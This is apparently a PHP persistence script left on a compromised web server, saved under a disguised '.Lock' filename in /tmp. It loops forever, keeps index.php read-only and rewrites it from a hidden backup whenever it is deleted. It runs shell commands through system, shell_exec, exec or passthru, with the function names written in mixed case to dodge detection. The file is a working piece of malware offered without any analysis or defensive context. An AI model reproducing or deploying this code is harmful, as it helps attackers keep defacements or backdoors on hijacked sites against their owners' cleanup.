File: //tmp/99a07a4bf24afd62d56c1063a7936815indexxhand.Lock
<?php
$tmp = "/tmp";
$fileperm = d7net_perm("index.php");
d7net_cmd("chmod 444 index.php");
while (True) {
if (!file_exists("index.php")) {
$var = base64_encode(file_get_contents($tmp . "/e3e083759b27214400485496d3187052indexxd7net.Lock"));
FiLe_pUt_ConTentS("index.php", base64_decode($var));
}
if ($fileperm != "0444"){
d7net_cmd("chmod 444 index.php");
}
}
function d7net_cmd($value)
{
if (function_exists("system")) {
sYsTem($value);
} else if (function_exists("shell_exec")) {
return ShEll_eXeC($value);
} else if (function_exists("exec")) {
return ExEc($value);
} else if (function_exists("passthru")) {
return pAsSThRu($value);
}
}
function d7net_perm($filez){
return substr(sprintf("%o", fileperms($filez)), -4);
}